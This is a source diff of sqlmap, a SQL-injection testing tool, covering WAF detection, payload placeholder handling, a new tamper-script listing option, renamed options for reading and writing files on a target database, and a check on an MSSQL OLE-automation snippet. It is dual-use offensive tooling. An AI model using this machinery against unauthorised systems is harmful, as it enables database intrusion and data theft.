warnMsg += "is protected by some kind of WAF/IPS/IDS" warnMsg += "is protected by some kind of WAF/IPS"
logger.critical(warnMsg) logger.critical(warnMsg)
return _ return _
@@ -1343,7 +1340,7 @@ def checkWaf():
return None return None
infoMsg = "checking if the target is protected by " infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS" infoMsg += "some kind of WAF/IPS"
logger.info(infoMsg) logger.info(infoMsg)
retVal = False retVal = False
@@ -1357,7 +1354,10 @@ def checkWaf():
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
pushValue(kb.redirectChoice)
pushValue(conf.timeout) pushValue(conf.timeout)
kb.redirectChoice = REDIRECTION.YES
conf.timeout = IDS_WAF_CHECK_TIMEOUT conf.timeout = IDS_WAF_CHECK_TIMEOUT
try: try:
@@ -1366,16 +1366,18 @@ def checkWaf():
retVal = True retVal = True
finally: finally:
kb.matchRatio = None kb.matchRatio = None
conf.timeout = popValue() conf.timeout = popValue()
kb.redirectChoice = popValue()
if retVal: if retVal:
warnMsg = "heuristics detected that the target " warnMsg = "heuristics detected that the target "
warnMsg += "is protected by some kind of WAF/IPS/IDS" warnMsg += "is protected by some kind of WAF/IPS"
logger.critical(warnMsg) logger.critical(warnMsg)
if not conf.identifyWaf: if not conf.identifyWaf:
message = "do you want sqlmap to try to detect backend " message = "do you want sqlmap to try to detect backend "
message += "WAF/IPS/IDS? [y/N] " message += "WAF/IPS? [y/N] "
if readInput(message, default='N', boolean=True): if readInput(message, default='N', boolean=True):
conf.identifyWaf = True conf.identifyWaf = True
@@ -1399,7 +1401,7 @@ def identifyWaf():
kb.testMode = True kb.testMode = True
infoMsg = "using WAF scripts to detect " infoMsg = "using WAF scripts to detect "
infoMsg += "backend WAF/IPS/IDS protection" infoMsg += "backend WAF/IPS protection"
logger.info(infoMsg) logger.info(infoMsg)
@cachedmethod @cachedmethod
@@ -1426,7 +1428,7 @@ def identifyWaf():
continue continue
try: try:
logger.debug("checking for WAF/IPS/IDS product '%s'" % product) logger.debug("checking for WAF/IPS product '%s'" % product)
found = function(_) found = function(_)
except Exception, ex: except Exception, ex:
errMsg = "exception occurred while running " errMsg = "exception occurred while running "
@@ -1436,19 +1438,19 @@ def identifyWaf():
found = False found = False
if found: if found:
errMsg = "WAF/IPS/IDS identified as '%s'" % product errMsg = "WAF/IPS identified as '%s'" % product
logger.critical(errMsg) logger.critical(errMsg)
retVal.append(product) retVal.append(product)
if retVal: if retVal:
if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower(): if kb.wafSpecificResponse and "You don't have permission to access" not in kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE) handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
os.close(handle) os.close(handle)
with openFile(filename, "w+b") as f: with openFile(filename, "w+b") as f:
f.write(kb.wafSpecificResponse) f.write(kb.wafSpecificResponse)
message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename message = "WAF/IPS specific response can be found in '%s'. " % filename
message += "If you know the details on used protection please " message += "If you know the details on used protection please "
message += "report it along with specific response " message += "report it along with specific response "
message += "to '%s'" % DEV_EMAIL_ADDRESS message += "to '%s'" % DEV_EMAIL_ADDRESS
@@ -1465,7 +1467,7 @@ def identifyWaf():
if not choice: if not choice:
raise SqlmapUserQuitException raise SqlmapUserQuitException
else: else:
warnMsg = "WAF/IPS/IDS product hasn't been identified" warnMsg = "WAF/IPS product hasn't been identified"
logger.warn(warnMsg) logger.warn(warnMsg)
kb.testType = None kb.testType = None
@@ -1547,6 +1549,10 @@ def checkConnection(suppressOutput=False):
kb.errorIsNone = False kb.errorIsNone = False
if any(_ in (kb.serverHeader or "") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):
singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % kb.serverHeader)
conf.disablePrecon = True
if not kb.originalPage and wasLastResponseHTTPError(): if not kb.originalPage and wasLastResponseHTTPError():
errMsg = "unable to retrieve page content" errMsg = "unable to retrieve page content"
raise SqlmapConnectionException(errMsg) raise SqlmapConnectionException(errMsg)

View File

@@ -311,9 +311,12 @@ class Agent(object):
for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)): for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
payload = payload.replace(_, randomStr()) payload = payload.replace(_, randomStr())
if origValue is not None and "[ORIGVALUE]" in payload: if origValue is not None:
origValue = getUnicode(origValue) origValue = getUnicode(origValue)
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) if "[ORIGVALUE]" in payload:
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
if "[ORIGINAL]" in payload:
payload = getUnicode(payload).replace("[ORIGINAL]", origValue)
if INFERENCE_MARKER in payload: if INFERENCE_MARKER in payload:
if Backend.getIdentifiedDbms() is not None: if Backend.getIdentifiedDbms() is not None:

View File

@@ -126,7 +126,7 @@ class BigArray(list):
try: try:
with open(self.chunks[index], "rb") as f: with open(self.chunks[index], "rb") as f:
self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False) self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False)
except IOError, ex: except Exception, ex:
errMsg = "exception occurred while retrieving data " errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex.message errMsg += "from a temporary file ('%s')" % ex.message
raise SqlmapSystemException(errMsg) raise SqlmapSystemException(errMsg)

View File

@@ -165,6 +165,7 @@ from lib.core.settings import URI_QUESTION_MARKER
from lib.core.settings import URLENCODE_CHAR_LIMIT from lib.core.settings import URLENCODE_CHAR_LIMIT
from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import URLENCODE_FAILSAFE_CHARS
from lib.core.settings import USER_AGENT_ALIASES from lib.core.settings import USER_AGENT_ALIASES
from lib.core.settings import VERSION
from lib.core.settings import VERSION_STRING from lib.core.settings import VERSION_STRING
from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.settings import WEBSCARAB_SPLITTER
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
@@ -868,11 +869,11 @@ def boldifyMessage(message):
retVal = message retVal = message
if any(_ in message for _ in BOLD_PATTERNS): if any(_ in message for _ in BOLD_PATTERNS):
retVal = setColor(message, True) retVal = setColor(message, bold=True)
return retVal return retVal
def setColor(message, bold=False): def setColor(message, color=None, bold=False):
retVal = message retVal = message
level = extractRegexResult(r"\[(?P<result>%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel") level = extractRegexResult(r"\[(?P<result>%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel")
@@ -880,15 +881,11 @@ def setColor(message, bold=False):
level = unicodeencode(level) level = unicodeencode(level)
if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler
if bold: if bold or color:
retVal = colored(message, color=None, on_color=None, attrs=("bold",)) retVal = colored(message, color=color, on_color=None, attrs=("bold",) if bold else None)
elif level: elif level:
level = getattr(logging, level, None) if isinstance(level, basestring) else level level = getattr(logging, level, None) if isinstance(level, basestring) else level
_ = LOGGER_HANDLER.level_map.get(level) retVal = LOGGER_HANDLER.colorize(message, level)
if _:
background, foreground, bold = _
retVal = colored(message, color=foreground, on_color="on_%s" % background if background else None, attrs=("bold",) if bold else None)
kb.stickyLevel = level if message and message[-1] != "\n" else None kb.stickyLevel = level if message and message[-1] != "\n" else None
return retVal return retVal
@@ -929,7 +926,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=
if conf.get("api"): if conf.get("api"):
sys.stdout.write(message, status, content_type) sys.stdout.write(message, status, content_type)
else: else:
sys.stdout.write(setColor(message, bold)) sys.stdout.write(setColor(message, bold=bold))
sys.stdout.flush() sys.stdout.flush()
except IOError: except IOError:
@@ -1013,6 +1010,9 @@ def readInput(message, default=None, checkBatch=True, boolean=False):
kb.prependFlag = False kb.prependFlag = False
if conf.get("answers"): if conf.get("answers"):
if not any(_ in conf.answers for _ in ",="):
return conf.answers
for item in conf.answers.split(','): for item in conf.answers.split(','):
question = item.split('=')[0].strip() question = item.split('=')[0].strip()
answer = item.split('=')[1] if len(item.split('=')) > 1 else None answer = item.split('=')[1] if len(item.split('=')) > 1 else None
@@ -1166,6 +1166,9 @@ def getHeader(headers, key):
def checkFile(filename, raiseOnError=True): def checkFile(filename, raiseOnError=True):
""" """
Checks for file existence and readability Checks for file existence and readability
>>> checkFile(__file__)
True
""" """
valid = True valid = True
@@ -1176,7 +1179,7 @@ def checkFile(filename, raiseOnError=True):
try: try:
if filename is None or not os.path.isfile(filename): if filename is None or not os.path.isfile(filename):
valid = False valid = False
except UnicodeError: except:
valid = False valid = False
if valid: if valid:
@@ -1301,7 +1304,7 @@ def setPaths(rootPath):
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml") paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
for path in paths.values(): for path in paths.values():
if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")): if any(path.endswith(_) for _ in (".md5", ".txt", ".xml", ".zip")):
checkFile(path) checkFile(path)
def weAreFrozen(): def weAreFrozen():
@@ -1321,8 +1324,6 @@ def parseTargetDirect():
if not conf.direct: if not conf.direct:
return return
conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters
details = None details = None
remote = False remote = False
@@ -1353,7 +1354,7 @@ def parseTargetDirect():
conf.hostname = "localhost" conf.hostname = "localhost"
conf.port = 0 conf.port = 0
conf.dbmsDb = details.group("db") conf.dbmsDb = details.group("db").strip() if details.group("db") is not None else None
conf.parameters[None] = "direct connection" conf.parameters[None] = "direct connection"
break break
@@ -1433,7 +1434,7 @@ def parseTargetUrl():
errMsg += "on this platform" errMsg += "on this platform"
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I): if not re.search(r"^https?://", conf.url, re.I) and not re.search(r"^wss?://", conf.url, re.I):
if re.search(r":443\b", conf.url): if re.search(r":443\b", conf.url):
conf.url = "https://%s" % conf.url conf.url = "https://%s" % conf.url
else: else:
@@ -1534,14 +1535,14 @@ def expandAsteriskForColumns(expression):
the SQL query string (expression) the SQL query string (expression)
""" """
asterisk = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression) match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression)
if asterisk: if match:
infoMsg = "you did not provide the fields in your query. " infoMsg = "you did not provide the fields in your query. "
infoMsg += "sqlmap will retrieve the column names itself" infoMsg += "sqlmap will retrieve the column names itself"
logger.info(infoMsg) logger.info(infoMsg)
_ = asterisk.group(2).replace("..", '.').replace(".dbo.", '.') _ = match.group(2).replace("..", '.').replace(".dbo.", '.')
db, conf.tbl = _.split('.', 1) if '.' in _ else (None, _) db, conf.tbl = _.split('.', 1) if '.' in _ else (None, _)
if db is None: if db is None:
@@ -1650,6 +1651,9 @@ def parseUnionPage(page):
def parseFilePaths(page): def parseFilePaths(page):
""" """
Detects (possible) absolute system paths inside the provided page content Detects (possible) absolute system paths inside the provided page content
>>> _ = "/var/www/html/index.php"; parseFilePaths("<html>Error occurred at line 207 of: %s<br>Please contact your administrator</html>" % _); _ in kb.absFilePaths
True
""" """
if page: if page:
@@ -2042,6 +2046,9 @@ def parseXmlFile(xmlFile, handler):
def getSQLSnippet(dbms, sfile, **variables): def getSQLSnippet(dbms, sfile, **variables):
""" """
Returns content of SQL snippet located inside 'procs/' directory Returns content of SQL snippet located inside 'procs/' directory
>>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
True
""" """
if sfile.endswith('.sql') and os.path.exists(sfile): if sfile.endswith('.sql') and os.path.exists(sfile):
@@ -2081,9 +2088,12 @@ def getSQLSnippet(dbms, sfile, **variables):
return retVal return retVal
def readCachedFileContent(filename, mode='rb'): def readCachedFileContent(filename, mode="rb"):
""" """
Cached reading of file content (avoiding multiple same file reading) Cached reading of file content (avoiding multiple same file reading)
>>> "readCachedFileContent" in readCachedFileContent(__file__)
True
""" """
if filename not in kb.cache.content: if filename not in kb.cache.content:
@@ -2140,6 +2150,9 @@ def average(values):
def calculateDeltaSeconds(start): def calculateDeltaSeconds(start):
""" """
Returns elapsed time from start till now Returns elapsed time from start till now
>>> calculateDeltaSeconds(0) > 1151721660
True
""" """
return time.time() - start return time.time() - start
@@ -2147,6 +2160,9 @@ def calculateDeltaSeconds(start):
def initCommonOutputs(): def initCommonOutputs():
""" """
Initializes dictionary containing common output values used by "good samaritan" feature Initializes dictionary containing common output values used by "good samaritan" feature
>>> initCommonOutputs(); "information_schema" in kb.commonOutputs["Databases"]
True
""" """
kb.commonOutputs = {} kb.commonOutputs = {}
@@ -2914,15 +2930,15 @@ def filterStringValue(value, charRegex, replacement=""):
return retVal return retVal
def filterControlChars(value): def filterControlChars(value, replacement=' '):
""" """
Returns string value with control chars being supstituted with ' ' Returns string value with control chars being supstituted with replacement character
>>> filterControlChars(u'AND 1>(2+3)\\n--') >>> filterControlChars(u'AND 1>(2+3)\\n--')
u'AND 1>(2+3) --' u'AND 1>(2+3) --'
""" """
return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement)
def isDBMSVersionAtLeast(version): def isDBMSVersionAtLeast(version):
""" """
@@ -3351,6 +3367,25 @@ def unhandledExceptionMessage():
return errMsg return errMsg
def getLatestRevision():
"""
Retrieves latest revision from the offical repository
>>> getLatestRevision() == VERSION
True
"""
retVal = None
req = urllib2.Request(url="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py")
try:
content = urllib2.urlopen(req).read()
retVal = extractRegexResult(r"VERSION\s*=\s*[\"'](?P<result>[\d.]+)", content)
except:
pass
return retVal
def createGithubIssue(errMsg, excMsg): def createGithubIssue(errMsg, excMsg):
""" """
Automatically create a Github issue with unhandled exception information Automatically create a Github issue with unhandled exception information
@@ -3444,8 +3479,7 @@ def maskSensitiveData(msg):
retVal = retVal.replace(value, '*' * len(value)) retVal = retVal.replace(value, '*' * len(value))
# Just in case (for problematic parameters regarding user encoding) # Just in case (for problematic parameters regarding user encoding)
match = re.search(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal) for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal):
if match:
retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
if getpass.getuser(): if getpass.getuser():
@@ -3753,7 +3787,7 @@ def expandMnemonics(mnemonics, parser, args):
logger.debug(debugMsg) logger.debug(debugMsg)
else: else:
found = sorted(options.keys(), key=lambda x: len(x))[0] found = sorted(options.keys(), key=lambda x: len(x))[0]
warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options.keys()))
warnMsg += "Resolved to shortest of those ('%s')" % found warnMsg += "Resolved to shortest of those ('%s')" % found
logger.warn(warnMsg) logger.warn(warnMsg)
@@ -4137,6 +4171,9 @@ def checkSystemEncoding():
def evaluateCode(code, variables=None): def evaluateCode(code, variables=None):
""" """
Executes given python code given in a string form Executes given python code given in a string form
>>> _ = {}; evaluateCode("a = 1; b = 2; c = a", _); _["c"]
1
""" """
try: try:
@@ -4190,6 +4227,9 @@ def incrementCounter(technique):
def getCounter(technique): def getCounter(technique):
""" """
Returns query counter for a given technique Returns query counter for a given technique
>>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED)
1
""" """
return kb.counters.get(technique, 0) return kb.counters.get(technique, 0)
@@ -4275,9 +4315,11 @@ def extractExpectedValue(value, expected):
value = value.strip().lower() value = value.strip().lower()
if value in ("true", "false"): if value in ("true", "false"):
value = value == "true" value = value == "true"
elif value in ('t', 'f'):
value = value == 't'
elif value in ("1", "-1"): elif value in ("1", "-1"):
value = True value = True
elif value == "0": elif value == '0':
value = False value = False
else: else:
value = None value = None
@@ -4427,6 +4469,9 @@ def zeroDepthSearch(expression, value):
""" """
Searches occurrences of value inside expression at 0-depth level Searches occurrences of value inside expression at 0-depth level
regarding the parentheses regarding the parentheses
>>> _ = "SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL"; _[zeroDepthSearch(_, "FROM")[0]:]
'FROM DUAL'
""" """
retVal = [] retVal = []
@@ -4462,7 +4507,7 @@ def pollProcess(process, suppress_errors=False):
Checks for process status (prints . if still running) Checks for process status (prints . if still running)
""" """
while True: while process:
dataToStdout(".") dataToStdout(".")
time.sleep(1) time.sleep(1)
@@ -4687,7 +4732,38 @@ def getSafeExString(ex, encoding=None):
return getUnicode(retVal or "", encoding=encoding).strip() return getUnicode(retVal or "", encoding=encoding).strip()
def safeVariableNaming(value): def safeVariableNaming(value):
"""
Returns escaped safe-representation of a given variable name that can be used in Python evaluated code
>>> safeVariableNaming("foo bar")
'foo__SAFE__20bar'
"""
return re.sub(r"[^\w]", lambda match: "%s%02x" % (SAFE_VARIABLE_MARKER, ord(match.group(0))), value) return re.sub(r"[^\w]", lambda match: "%s%02x" % (SAFE_VARIABLE_MARKER, ord(match.group(0))), value)
def unsafeVariableNaming(value): def unsafeVariableNaming(value):
"""
Returns unescaped safe-representation of a given variable name
>>> unsafeVariableNaming("foo__SAFE__20bar")
'foo bar'
"""
return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value) return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value)
def firstNotNone(*args):
"""
Returns first not-None value from a given list of arguments
>>> firstNotNone(None, None, 1, 2, 3)
1
"""
retVal = None
for _ in args:
if _ is not None:
retVal = _
break
return retVal

View File

@@ -263,6 +263,10 @@ SQL_STATEMENTS = {
"commit ", "commit ",
"rollback ", "rollback ",
), ),
"SQL administration": (
"set ",
),
} }
POST_HINT_CONTENT_TYPES = { POST_HINT_CONTENT_TYPES = {

View File

@@ -47,6 +47,7 @@ from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT
from lib.core.settings import VERSION_STRING
from lib.core.settings import WINDOWS_RESERVED_NAMES from lib.core.settings import WINDOWS_RESERVED_NAMES
from thirdparty.magic import magic from thirdparty.magic import magic
@@ -532,6 +533,7 @@ class Dump(object):
elif conf.dumpFormat == DUMP_FORMAT.HTML: elif conf.dumpFormat == DUMP_FORMAT.HTML:
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n") dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING) dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
dataToDumpFile(dumpFP, "<meta name=\"generator\" content=\"%s\" />\n" % VERSION_STRING)
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n") dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")

View File

@@ -256,6 +256,7 @@ class PAYLOAD:
3: "LIKE single quoted string", 3: "LIKE single quoted string",
4: "Double quoted string", 4: "Double quoted string",
5: "LIKE double quoted string", 5: "LIKE double quoted string",
6: "Identifier (e.g. column name)",
} }
RISK = { RISK = {
@@ -275,6 +276,7 @@ class PAYLOAD:
6: "TOP", 6: "TOP",
7: "Table name", 7: "Table name",
8: "Column name", 8: "Column name",
9: "Pre-WHERE (non-query)",
} }
class METHOD: class METHOD:

View File

@@ -54,6 +54,7 @@ from lib.core.common import resetCookieJar
from lib.core.common import runningAsAdmin from lib.core.common import runningAsAdmin
from lib.core.common import safeExpandUser from lib.core.common import safeExpandUser
from lib.core.common import saveConfig from lib.core.common import saveConfig
from lib.core.common import setColor
from lib.core.common import setOptimize from lib.core.common import setOptimize
from lib.core.common import setPaths from lib.core.common import setPaths
from lib.core.common import singleTimeWarnMessage from lib.core.common import singleTimeWarnMessage
@@ -607,22 +608,22 @@ def _setMetasploit():
raise SqlmapFilePathException(errMsg) raise SqlmapFilePathException(errMsg)
def _setWriteFile(): def _setWriteFile():
if not conf.wFile: if not conf.fileWrite:
return return
debugMsg = "setting the write file functionality" debugMsg = "setting the write file functionality"
logger.debug(debugMsg) logger.debug(debugMsg)
if not os.path.exists(conf.wFile): if not os.path.exists(conf.fileWrite):
errMsg = "the provided local file '%s' does not exist" % conf.wFile errMsg = "the provided local file '%s' does not exist" % conf.fileWrite
raise SqlmapFilePathException(errMsg) raise SqlmapFilePathException(errMsg)
if not conf.dFile: if not conf.fileDest:
errMsg = "you did not provide the back-end DBMS absolute path " errMsg = "you did not provide the back-end DBMS absolute path "
errMsg += "where you want to write the local file '%s'" % conf.wFile errMsg += "where you want to write the local file '%s'" % conf.fileWrite
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
conf.wFileType = getFileType(conf.wFile) conf.fileWriteType = getFileType(conf.fileWrite)
def _setOS(): def _setOS():
""" """
@@ -699,6 +700,22 @@ def _setDBMS():
break break
def _listTamperingFunctions():
"""
Lists available tamper functions
"""
if conf.listTampers:
infoMsg = "listing available tamper scripts\n"
logger.info(infoMsg)
for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))):
content = openFile(script, "rb").read()
match = re.search(r'(?s)__priority__.+"""(.+)"""', content)
if match:
comment = match.group(1).strip()
dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip())))
def _setTamperingFunctions(): def _setTamperingFunctions():
""" """
Loads tampering functions from given script(s) Loads tampering functions from given script(s)
@@ -807,7 +824,7 @@ def _setTamperingFunctions():
def _setWafFunctions(): def _setWafFunctions():
""" """
Loads WAF/IPS/IDS detecting functions from script(s) Loads WAF/IPS detecting functions from script(s)
""" """
if conf.identifyWaf: if conf.identifyWaf:
@@ -1492,14 +1509,14 @@ def _cleanupOptions():
if conf.url: if conf.url:
conf.url = conf.url.strip() conf.url = conf.url.strip()
if conf.rFile: if conf.fileRead:
conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile)) conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead))
if conf.wFile: if conf.fileWrite:
conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile)) conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite))
if conf.dFile: if conf.fileDest:
conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile)) conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest))
if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"): if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"):
conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl) conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl)
@@ -1682,7 +1699,7 @@ def _setConfAttributes():
conf.tests = [] conf.tests = []
conf.trafficFP = None conf.trafficFP = None
conf.HARCollectorFactory = None conf.HARCollectorFactory = None
conf.wFileType = None conf.fileWriteType = None
def _setKnowledgeBaseAttributes(flushAll=True): def _setKnowledgeBaseAttributes(flushAll=True):
""" """
@@ -1696,6 +1713,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.absFilePaths = set() kb.absFilePaths = set()
kb.adjustTimeDelay = None kb.adjustTimeDelay = None
kb.alerted = False kb.alerted = False
kb.aliasName = randomStr()
kb.alwaysRefresh = None kb.alwaysRefresh = None
kb.arch = None kb.arch = None
kb.authHeader = None kb.authHeader = None
@@ -1835,6 +1853,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.safeCharEncode = False kb.safeCharEncode = False
kb.safeReq = AttribDict() kb.safeReq = AttribDict()
kb.secondReq = None kb.secondReq = None
kb.serverHeader = None
kb.singleLogFlags = set() kb.singleLogFlags = set()
kb.skipSeqMatcher = False kb.skipSeqMatcher = False
kb.reduceTests = None kb.reduceTests = None
@@ -2459,6 +2478,7 @@ def init():
_setDNSServer() _setDNSServer()
_adjustLoggingFormatter() _adjustLoggingFormatter()
_setMultipleTargets() _setMultipleTargets()
_listTamperingFunctions()
_setTamperingFunctions() _setTamperingFunctions()
_setWafFunctions() _setWafFunctions()
_setTrafficOutputFP() _setTrafficOutputFP()

View File

@@ -165,9 +165,9 @@ optDict = {
}, },
"File system": { "File system": {
"rFile": "string", "fileRead": "string",
"wFile": "string", "fileWrite": "string",
"dFile": "string", "fileDest": "string",
}, },
"Takeover": { "Takeover": {
@@ -227,6 +227,7 @@ optDict = {
"disableColoring": "boolean", "disableColoring": "boolean",
"googlePage": "integer", "googlePage": "integer",
"identifyWaf": "boolean", "identifyWaf": "boolean",
"listTampers": "boolean",
"mobile": "boolean", "mobile": "boolean",
"offline": "boolean", "offline": "boolean",
"purge": "boolean", "purge": "boolean",

View File

@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.2.7.0" VERSION = "1.2.10.0"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -45,10 +45,10 @@ BANNER = """\033[01;33m\
DIFF_TOLERANCE = 0.05 DIFF_TOLERANCE = 0.05
CONSTANT_RATIO = 0.9 CONSTANT_RATIO = 0.9
# Ratio used in heuristic check for WAF/IPS/IDS protected targets # Ratio used in heuristic check for WAF/IPS protected targets
IDS_WAF_CHECK_RATIO = 0.5 IDS_WAF_CHECK_RATIO = 0.5
# Timeout used in heuristic check for WAF/IPS/IDS protected targets # Timeout used in heuristic check for WAF/IPS protected targets
IDS_WAF_CHECK_TIMEOUT = 10 IDS_WAF_CHECK_TIMEOUT = 10
# Lower and upper values for match ratio in case of stable page # Lower and upper values for match ratio in case of stable page
@@ -97,6 +97,9 @@ MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) # Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
PRECONNECT_CANDIDATE_TIMEOUT = 10 PRECONNECT_CANDIDATE_TIMEOUT = 10
# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support)
PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP",)
# Maximum sleep time in "Murphy" (testing) mode # Maximum sleep time in "Murphy" (testing) mode
MAX_MURPHY_SLEEP_TIME = 3 MAX_MURPHY_SLEEP_TIME = 3
@@ -321,6 +324,7 @@ FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"in (?P<result>
# Regular expressions used for parsing error messages (--parse-errors) # Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = ( ERROR_PARSING_REGEXES = (
